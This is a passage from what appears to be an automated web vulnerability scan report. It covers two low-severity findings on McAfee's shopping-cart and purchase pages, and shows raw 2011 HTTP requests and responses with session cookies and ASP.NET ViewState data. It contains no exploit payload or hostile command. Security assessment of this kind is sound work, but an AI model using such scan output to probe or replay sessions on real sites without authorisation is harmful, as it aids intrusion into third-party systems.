FWaXJ1cyBJbmZvcm1hdGlvbmRkAgcPZBYCZg8PFgQfAwUcPHNwYW4+U2VjdXJpdHkgQWR2aWNlPC9zcGFuPh8HBQ9TZWN1cml0eSBBZHZpY2VkZAIJDw8WBB8DBRQ8c3Bhbj5TdXBwb3J0PC9zcGFuPh8HBQdTdXBwb3J0ZGQCCw8PFgQfAwUWPHNwYW4+RG93bmxvYWRzPC9zcGFuPh8HBQlEb3dubG9hZHNkZAIED2QWCAIBDw8WAh8JaGRkAgMPZBYCZg8PFgYfAwUKTXkgQWNjb3VudB8FBSpodHRwOi8vaG9tZS5tY2FmZWUuY29tL3Jvb3QvTXlBY2NvdW50LmFzcHgfBwUKTXkgQWNjb3VudGRkAgUPZBYCZg8PFgIfBQUkaHR0cHM6Ly9ob21lLm1jYWZlZS5jb20vc2VjdXJlL2NhcnQvZBYCZg8PFgIfBgUEQ2FydBYCHw0FBENhcnRkAgcPZBYCZg8PFgYfAwUGTG9nIEluHwUFM2h0dHBzOi8vaG9tZS5tY2FmZWUuY29tL1NlY3VyZS9Qcm90ZWN0ZWQvTG9naW4uYXNweB8HBQZMb2cgSW5kZAIJD2QWAmYPZBYEAgEPZBYGZg8PFgIfBQUXaHR0cDovL2hvbWUubWNhZmVlLmNvbS9kFgJmDw8WBB8GBRNNY0FmZWUg4oCUIEZvciBIb21lHwcFE01jQWZlZSDigJQgRm9yIEhvbWVkZAICDw8WCB8GBRNNY0FmZWUg4oCUIEZvciBIb21lHwcFE01jQWZlZSDigJQgRm9yIEhvbWUfCAVDaHR0cHM6Ly9zZWN1cmVpbWFnZXMubWNhZmVlLmNvbS9jb21tb24vbWVkaWEvaW1hZ2VzL2hlYWRlci9sb2dvLmdpZh8JaGRkAgQPDxYCHwMFCEZvciBIb21lZGQCAw9kFgJmDw8WAh8FBUVodHRwczovL3d3dy5tY2FmZWVzZWN1cmUuY29tL1JhdGluZ1ZlcmlmeT9yZWY9aG9tZS5tY2FmZWUuY29tJmxhbmc9RU5kFgJmDw8WBB8IBUFodHRwczovL2ltYWdlcy5zY2FuYWxlcnQuY29tL21ldGVyL2hvbWUubWNhZmVlLmNvbS8zMS5naWY/bGFuZz1FTh8HBXdNY0FmZWUgU2VjdXJlIHNpdGVzIGhlbHAga2VlcCB5b3Ugc2FmZSBmcm9tIGlkZW50aXR5IHRoZWZ0LCBjcmVkaXQgY2FyZCBmcmF1ZCwgc3B5d2FyZSwgc3BhbSwgdmlydXNlcyBhbmQgb25saW5lIHNjYW1zLhYCHwoFZGphdmFzY3JpcHQ6YWxlcnQoIkNvcHlpbmcgUHJvaGliaXRlZCBieSBMYXcgLSBNY0FmZWUgU0VDVVJFIGlzIGEgVHJhZGVtYXJrIG9mIE1jQWZlZSIpO3JldHVybiBmYWxzZTtkAgsPZBYGAgIPZBYEZg8PFgIfCWdkFgRmEDwrAAoAZGQCAg9kFgICAQ8WAh8DBQtTZWN1cmUgUGFnZWQCAg9kFgRmEDwrAAoAZGQCAg9kFgICAQ8WAh8DBQtTZWN1cmUgUGFnZWQCAw9kFgRmEDwrAAoAZGQCAg9kFgICAQ8WAh8DBQtTZWN1cmUgUGFnZWQCBQ9kFgQCAxA8KwAKAGRkAgQPZBYCAgEPFgIfAwULU2VjdXJlIFBhZ2VkAg8PZBYGAgEPZBYEZg8PFgIfAwUKV2UgYWNjZXB0OmRkAgEPFgIeA3NyYwVOaHR0cHM6Ly9zZWN1cmVpbWFnZXMubWNhZmVlLmNvbS9sZWdhY3kvaG9tZS9wYXltZW50SWNvbnMvcGF5bWVudEljb25zRU4tVVMuZ2lmZAIDDw8WAh8DZWRkAgUPDxYCHwMFHSZjb3B5OyAyMDAzLTIwMTEgTWNBZmVlLCBJbmMuZGQCEQ9kFghmDxYCHwNlZAIDDxYCHwMFhAI8bWV0YSBuYW1lPSdXVC5tY19pZCcgIGNvbnRlbnQ9JzAnIC8+DQo8bWV0YSBuYW1lPSdXVC5tY19ldicgIGNvbnRlbnQ9J2NsaWNrJyAvPg0KPG1ldGEgbmFtZT0nV1Quel9jb3VudHJ5JyBjb250ZW50PSdFTi1VUycgLz4NCjxtZXRhIG5hbWU9J1dULnpfcmVmJyAgY29udGVudD0nT3RoZXInIC8+DQo8bWV0YSBuYW1lPSdXVC56X2NpZDEnICAgIGNvbnRlbnQ9Jzg2ODczJyAvPg0KPG1ldGEgbmFtZT0nV1Quel9jaWQyJyBjb250ZW50PSc4Njg3MycgLz4NCmQCBA8WAh8DBTM8bWV0YSBuYW1lPSdXVC5zaV9uJyAgY29udGVudD0nU2hvcHBpbmdDYXJ0SG9tZScgLz5kAgUPFgIfAwWQATxtZXRhIG5hbWU9J1dULnR4X2UnIGNvbnRlbnQ9J2EnIC8+PG1ldGEgbmFtZT0nV1Quc2lfeCcgY29udGVudD0nMScgLz48bWV0YSBuYW1lPSdXVC5wbl9za3UnIGNvbnRlbnQ9JzI4NCcgLz48bWV0YSBuYW1lPSdXVC50eF91JyBjb250ZW50PScxJyAvPmQCEw9kFgJmD2QWAmYPZBYCAgMPDxYCHwloZGQYCwVcY3RsMDAkTWFpbkNvbnRlbnQkbV9DYXJ0QmlsbGluZyRtX0FtYmlnb3VzUG9wdXAkbV9NTFN1YnNjcmlwdGlvbkFtYmlndW91cyRtX2FtYmlnb3VzRm9ybVZpZXcPZ2QFLWN0bDAwJE1haW5Db250ZW50JG1fUmVjZWlwdCRtX1JlY2VpcHRGb3JtVmlldw9nZAVfY3RsMDAkTWFpbkNvbnRlbnQkbV9DYXJ0QmlsbGluZyRtX0FtYmlnb3VzUG9wdXAkbV9SZW5ld1N1YnNjcmlwdGlvbkFtYmlndW91cyRtX2FtYmlnb3VzRm9ybVZpZXcPZ2QFMWN0bDAwJE1haW5Db250ZW50JG1fQ2FydEJpbGxpbmckbV9CaWxsaW5nRm9ybVZpZXcPZ2QFX2N0bDAwJE1haW5Db250ZW50JG1fQ2FydEJpbGxpbmckbV9BbWJpZ291c1BvcHVwJG1fUmVuZXdPckFkZExpY2Vuc2VBbWJpZ3VvdXMkbV9hbWJpZ291c0Zvcm1WaWV3D2dkBVdjdGwwMCRNYWluQ29udGVudCRtX0Jhc2tldCRtX0FtYmlnb3VzUG9wdXAkbV9NTFN1YnNjcmlwdGlvbkFtYmlndW91cyRtX2FtYmlnb3VzRm9ybVZpZXcPZ2QFWmN0bDAwJE1haW5Db250ZW50JG1fQmFza2V0JG1fQW1iaWdvdXNQb3B1cCRtX1JlbmV3T3JBZGRMaWNlbnNlQW1iaWd1b3VzJG1fYW1iaWdvdXNGb3JtVmlldw9nZAVLY3RsMDAkTWFpbkNvbnRlbnQkbV9CaWxsaW5nJG1fQmlsbGluZ0NvbnRhaW5lclVzZXJDb250cm9sJG1fQmlsbGluZ0Zvcm1WaWV3D2dkBVpjdGwwMCRNYWluQ29udGVudCRtX0Jhc2tldCRtX0FtYmlnb3VzUG9wdXAkbV9SZW5ld1N1YnNjcmlwdGlvbkFtYmlndW91cyRtX2FtYmlnb3VzRm9ybVZpZXcPZ2QFN2N0bDAwJE1haW5Db250ZW50JG1fQ29uZmlybU9yZGVyJG1fQ29uZmlybU9yZGVyRm9ybVZpZXcPZ2QFTWN0bDAwJE1haW5Db250ZW50JG1fQmlsbGluZyRtX0pwQmlsbGluZ0NvbnRhaW5lclVzZXJDb250cm9sJG1fQmlsbGluZ0Zvcm1WaWV3D2dk" />
...[SNIP]...

11.3. https://home.mcafee.com/secure/cart/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://home.mcafee.com
Path:   /secure/cart/

Request

GET /secure/cart/ HTTP/1.1
Host: home.mcafee.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionInfo=AffiliateId=0&CampaignId=78228; s_cc=true; s_campaign=78228; s_nr=1304109967309-New; s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; CampaignId=86873; CookieInformation=locale=us; SiteID=1; SessionInfo=AffiliateId=0&CampaignId=86873; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; Currency=56; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d266730%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; IscartemptySiteidAffid=no-1-0; AffID=0; Locale=en%2Dus; langid=1; lBounceURL=http%3A%2F%2Fus%2Emcafee%2Ecom%2Froot%2Fbasket%2Easp%3Faffid%3D0%26; lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; session%5Fdata=%3CSessionData%3E%0D%0A%09%3Ctempfrlu%3E%3C%2Ftempfrlu%3E%0D%0A%09%3Cwt%5Fsource%3EOther%3C%2Fwt%5Fsource%3E%0D%0A%09%3COrganicSearchtraffic%3E1%3C%2FOrganicSearchtraffic%3E%0D%0A%09%3Cwt%5Fsource%5Fcid%3E86873%3C%2Fwt%5Fsource%5Fcid%3E%0D%0A%09%3Cwt%5Fdestination%5Fcid%3E86873%3C%2Fwt%5Fdestination%5Fcid%3E%0D%0A%09%3CBasketflowid%3E0%3C%2FBasketflowid%3E%3C%2FSessionData%3E%0D%0A

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 20:58:11 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 20:58:11 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/secure/cart/; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 20:58:11 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 20:58:11 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV7
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 20:58:10 GMT
Content-Length: 36966


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNDAxNDE4NDc1D2QWAmYPZBYCAgEPFgYeA2RpcgUDbHRyHgRsYW5nBQJlbh4IeG1sOmxhbmcFAmVuFgQCAQ9kFgICAw8WAh4EVGV4dAW0AzxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0nL1VJRGVzaWduL0xlZ2FjeVNpdGUvU3R5bGVzL2RlZmF1bHQuY3NzJyB0eXBlPSd0ZXh0L2NzcycgbWVkaWE9J3NjcmVlbicgLz4NCjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0nL1VJRGVzaWduL0xlZ2FjeVNpdGUvU3R5bGVzL1BHU3R5bGVzL3BmbG93U3RhbmRhcmQuY3NzJyB0eXBlPSd0ZXh0L2NzcycgbWVkaWE9J3NjcmVlbicgLz4NCjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0nL1VJRGVzaWduL0xlZ2FjeVNpdGUvU3R5bGVzL2VuLVVTL2N1bHR1cmUuY3NzJyB0eXBlPSd0ZXh0L2NzcycgbWVkaWE9J3NjcmVlbicgLz4NCjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0nL1VJRGVzaWduL0xlZ2FjeVNpdGUvU3R5bGVzL1ByaW50LmNzcycgdHlwZT0ndGV4dC9jc3MnIG1lZGlhPSdwcmludCcgLz5kAgMPFgIeBmFjdGlvbgUNL3NlY3VyZS9jYXJ0LxYMAgcPZBYIZg9kFgJmD2QWCAIBD2QWBmYPDxYCHgtOYXZpZ2F0ZVVybAUXaHR0cDovL2hvbWUubWNhZmVlLmNvbS9kFgJmDw8WBB4NQWx0ZXJuYXRlVGV4dAUTTWNBZmVlIOKAlCBGb3IgSG9tZR4HVG9vbFRpcAUTTWNBZmVlIOKAlCBGb3IgSG9tZWRkAgIPDxYIHwYFE01jQWZlZSDigJQgRm9yIEhvbWUfBwUTTWNBZmVlIOKAlCBGb3IgSG9tZR4ISW1hZ2VVcmwFQ2h0dHBzOi8vc2VjdXJlaW1hZ2VzLm1jYWZlZS5jb20vY29tbW9uL21lZGlhL2ltYWdlcy9oZWFkZXIvbG9nby5naWYeB1Zpc2libGVoZGQCBA8PFgIfAwUIRm9yIEhvbWVkZAIDD2QWAmYPDxYCHwUFRWh0dHBzOi8vd3d3Lm1jYWZlZXNlY3VyZS5jb20vUmF0aW5nVmVyaWZ5P3JlZj1ob21lLm1jYWZlZS5jb20mbGFuZz1FTmQWAmYPDxYEHwgFQWh0dHBzOi8vaW1hZ2VzLnNjYW5hbGVydC5jb20vbWV0ZXIvaG9tZS5tY2FmZWUuY29tLzMxLmdpZj9sYW5nPUVOHwcFd01jQWZlZSBTZWN1cmUgc2l0ZXMgaGVscCBrZWVwIHlvdSBzYWZlIGZyb20gaWRlbnRpdHkgdGhlZnQsIGNyZWRpdCBjYXJkIGZyYXVkLCBzcHl3YXJlLCBzcGFtLCB2aXJ1c2VzIGFuZCBvbmxpbmUgc2NhbXMuFgIeDW9uY29udGV4dG1lbnUFZGphdmFzY3JpcHQ6YWxlcnQoIkNvcHlpbmcgUHJvaGliaXRlZCBieSBMYXcgLSBNY0FmZWUgU0VDVVJFIGlzIGEgVHJhZGVtYXJrIG9mIE1jQWZlZSIpO3JldHVybiBmYWxzZTtkAgUPZBYIAgMPZBYEZg8WAh4IQ3VzdG9tVUwFBUVOLVVTZAICDxYCHwsFBUVOLVVTZAIFD2QWAmYPDxYEHwMFGTxzcGFuPkFib3V0IE1jQWZlZTwvc3Bhbj4fBwUMQWJvdXQgTWNBZmVlZGQCBw9kFgJmDw8WBB8DBRc8c3Bhbj5Db250YWN0IFVzPC9zcGFuPh8HBQpDb250YWN0IFVzZGQCCQ9kFgRmDw8WBB8DBQZTZWFyY2gfBwUGU2VhcmNoZGQCAg8PZBYCHglvbmtleWRvd24FuAFpZiAoKGV2ZW50LndoaWNoID09IDEzKSB8fCAoZXZlbnQua2V5Q29kZSA9PSAxMykpIHtkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY3RsMDBfbV9IZWFkZXJGdWxsTmF2aWdhdGlvbl91Y01hc3Rlck5hdmlnYXRpb25fdWNIZWFkZXJVdGlsaXR5TmF2X1NlYXJjaF9idG5TZWFyY2gnKS5jbGljaygpO3JldHVybiBmYWxzZTt9ZAIHD2QWBGYPFgIfCWhkAgIPZBYCZg8PFgIfCWhkZAIBDw8WAh8JaGRkAgMPZBYMAgEPZBYCZg8PFgIfBgUESG9tZRYCHgV0aXRsZQUESG9tZWQCAw8PFgQfAwUVPHNwYW4+UHJvZHVjdHM8L3NwYW4+HwcFCFByb2R1Y3RzZGQCBQ8PFgQfAwUePHNwYW4+VmlydXMgSW5mb3JtYXRpb248L3NwYW4+HwcFEVZpcnVzIEluZm9ybWF0aW9uZGQCBw9kFgJmDw8WBB8DBRw8c3Bhbj5TZWN1cml0eSBBZHZpY2U8L3NwYW4+HwcFD1NlY3VyaXR5IEFkdmljZWRkAgkPDxYEHwMFFDxzcGFuPlN1cHBvcnQ8L3NwYW4+HwcFB1N1cHBvcnRkZAILDw8WBB8DBRY8c3Bhbj5Eb3dubG9hZHM8L3NwYW4+HwcFCURvd25sb2Fkc2RkAgQPZBYIAgEPDxYCHwloZGQCAw9kFgJmDw8WBh8DBQpNeSBBY2NvdW50HwUFKmh0dHA6Ly9ob21lLm1jYWZlZS5jb20vcm9vdC9NeUFjY291bnQuYXNweB8HBQpNeSBBY2NvdW50ZGQCBQ9kFgJmDw8WAh8FBSRodHRwczovL2hvbWUubWNhZmVlLmNvbS9zZWN1cmUvY2FydC9kFgJmDw8WAh8GBQRDYXJ0FgIfDQUEQ2FydGQCBw9kFgJmDw8WBh8DBQZMb2cgSW4fBQUzaHR0cHM6Ly9ob21lLm1jYWZlZS5jb20vU2VjdXJlL1Byb3RlY3RlZC9Mb2dpbi5hc3B4HwcFBkxvZyBJbmRkAgkPZBYCZg9kFgQCAQ9kFgZmDw8WAh8FBRdodHRwOi8vaG9tZS5tY2FmZWUuY29tL2QWAmYPDxYEHwYFE01jQWZlZSDigJQgRm9yIEhvbWUfBwUTTWNBZmVlIOKAlCBGb3IgSG9tZWRkAgIPDxYIHwYFE01jQWZlZSDigJQgRm9yIEhvbWUfBwUTTWNBZmVlIOKAlCBGb3IgSG9tZR8IBUNodHRwczovL3NlY3VyZWltYWdlcy5tY2FmZWUuY29tL2NvbW1vbi9tZWRpYS9pbWFnZXMvaGVhZGVyL2xvZ28uZ2lmHwloZGQCBA8PFgIfAwUIRm9yIEhvbWVkZAIDD2QWAmYPDxYCHwUFRWh0dHBzOi8vd3d3Lm1jYWZlZXNlY3VyZS5jb20vUmF0aW5nVmVyaWZ5P3JlZj1ob21lLm1jYWZlZS5jb20mbGFuZz1FTmQWAmYPDxYEHwgFQWh0dHBzOi8vaW1hZ2VzLnNjYW5hbGVydC5jb20vbWV0ZXIvaG9tZS5tY2FmZWUuY29tLzMxLmdpZj9sYW5nPUVOHwcFd01jQWZlZSBTZWN1cmUgc2l0ZXMgaGVscCBrZWVwIHlvdSBzYWZlIGZyb20gaWRlbnRpdHkgdGhlZnQsIGNyZWRpdCBjYXJkIGZyYXVkLCBzcHl3YXJlLCBzcGFtLCB2aXJ1c2VzIGFuZCBvbmxpbmUgc2NhbXMuFgIfCgVkamF2YXNjcmlwdDphbGVydCgiQ29weWluZyBQcm9oaWJpdGVkIGJ5IExhdyAtIE1jQWZlZSBTRUNVUkUgaXMgYSBUcmFkZW1hcmsgb2YgTWNBZmVlIik7cmV0dXJuIGZhbHNlO2QCCw9kFgYCAg9kFgRmDw8WAh8JZ2QWBGYQPCsACgBkZAICD2QWAgIBDxYCHwMFC1NlY3VyZSBQYWdlZAICD2QWBGYQPCsACgBkZAICD2QWAgIBDxYCHwMFC1NlY3VyZSBQYWdlZAIDD2QWBGYQPCsACgBkZAICD2QWAgIBDxYCHwMFC1NlY3VyZSBQYWdlZAIFD2QWBAIDEDwrAAoAZGQCBA9kFgICAQ8WAh8DBQtTZWN1cmUgUGFnZWQCDw9kFgYCAQ9kFgRmDw8WAh8DBQpXZSBhY2NlcHQ6ZGQCAQ8WAh4Dc3JjBU5odHRwczovL3NlY3VyZWltYWdlcy5tY2FmZWUuY29tL2xlZ2FjeS9ob21lL3BheW1lbnRJY29ucy9wYXltZW50SWNvbnNFTi1VUy5naWZkAgMPDxYCHwNlZGQCBQ8PFgIfAwUdJmNvcHk7IDIwMDMtMjAxMSBNY0FmZWUsIEluYy5kZAIRD2QWCGYPFgIfA2VkAgMPFgIfAwWEAjxtZXRhIG5hbWU9J1dULm1jX2lkJyAgY29udGVudD0nMCcgLz4NCjxtZXRhIG5hbWU9J1dULm1jX2V2JyAgY29udGVudD0nY2xpY2snIC8+DQo8bWV0YSBuYW1lPSdXVC56X2NvdW50cnknIGNvbnRlbnQ9J0VOLVVTJyAvPg0KPG1ldGEgbmFtZT0nV1Quel9yZWYnICBjb250ZW50PSdPdGhlcicgLz4NCjxtZXRhIG5hbWU9J1dULnpfY2lkMScgICAgY29udGVudD0nODY4NzMnIC8+DQo8bWV0YSBuYW1lPSdXVC56X2NpZDInIGNvbnRlbnQ9Jzg2ODczJyAvPg0KZAIEDxYCHwMFMzxtZXRhIG5hbWU9J1dULnNpX24nICBjb250ZW50PSdTaG9wcGluZ0NhcnRIb21lJyAvPmQCBQ8WAh8DBZABPG1ldGEgbmFtZT0nV1QudHhfZScgY29udGVudD0nYScgLz48bWV0YSBuYW1lPSdXVC5zaV94JyBjb250ZW50PScxJyAvPjxtZXRhIG5hbWU9J1dULnBuX3NrdScgY29udGVudD0nMjg0JyAvPjxtZXRhIG5hbWU9J1dULnR4X3UnIGNvbnRlbnQ9JzEnIC8+ZAITD2QWAmYPZBYCZg9kFgICAw8PFgIfCWhkZBgLBVpjdGwwMCRNYWluQ29udGVudCRtX0Jhc2tldCRtX0FtYmlnb3VzUG9wdXAkbV9SZW5ld1N1YnNjcmlwdGlvbkFtYmlndW91cyRtX2FtYmlnb3VzRm9ybVZpZXcPZ2QFLWN0bDAwJE1haW5Db250ZW50JG1fUmVjZWlwdCRtX1JlY2VpcHRGb3JtVmlldw9nZAVfY3RsMDAkTWFpbkNvbnRlbnQkbV9DYXJ0QmlsbGluZyRtX0FtYmlnb3VzUG9wdXAkbV9SZW5ld1N1YnNjcmlwdGlvbkFtYmlndW91cyRtX2FtYmlnb3VzRm9ybVZpZXcPZ2QFXGN0bDAwJE1haW5Db250ZW50JG1fQ2FydEJpbGxpbmckbV9BbWJpZ291c1BvcHVwJG1fTUxTdWJzY3JpcHRpb25BbWJpZ3VvdXMkbV9hbWJpZ291c0Zvcm1WaWV3D2dkBTFjdGwwMCRNYWluQ29udGVudCRtX0NhcnRCaWxsaW5nJG1fQmlsbGluZ0Zvcm1WaWV3D2dkBTdjdGwwMCRNYWluQ29udGVudCRtX0NvbmZpcm1PcmRlciRtX0NvbmZpcm1PcmRlckZvcm1WaWV3D2dkBVpjdGwwMCRNYWluQ29udGVudCRtX0Jhc2tldCRtX0FtYmlnb3VzUG9wdXAkbV9SZW5ld09yQWRkTGljZW5zZUFtYmlndW91cyRtX2FtYmlnb3VzRm9ybVZpZXcPZ2QFS2N0bDAwJE1haW5Db250ZW50JG1fQmlsbGluZyRtX0JpbGxpbmdDb250YWluZXJVc2VyQ29udHJvbCRtX0JpbGxpbmdGb3JtVmlldw9nZAVXY3RsMDAkTWFpbkNvbnRlbnQkbV9CYXNrZXQkbV9BbWJpZ291c1BvcHVwJG1fTUxTdWJzY3JpcHRpb25BbWJpZ3VvdXMkbV9hbWJpZ291c0Zvcm1WaWV3D2dkBV9jdGwwMCRNYWluQ29udGVudCRtX0NhcnRCaWxsaW5nJG1fQW1iaWdvdXNQb3B1cCRtX1JlbmV3T3JBZGRMaWNlbnNlQW1iaWd1b3VzJG1fYW1iaWdvdXNGb3JtVmlldw9nZAVNY3RsMDAkTWFpbkNvbnRlbnQkbV9CaWxsaW5nJG1fSnBCaWxsaW5nQ29udGFpbmVyVXNlckNvbnRyb2wkbV9CaWxsaW5nRm9ybVZpZXcPZ2Q=" />
...[SNIP]...

11.4. https://home.mcafee.com/secure/purchase/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://home.mcafee.com
Path:   /secure/purchase/

Request

GET /secure/purchase/ HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:23 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:23 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/secure/purchase/; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:23 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:23 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
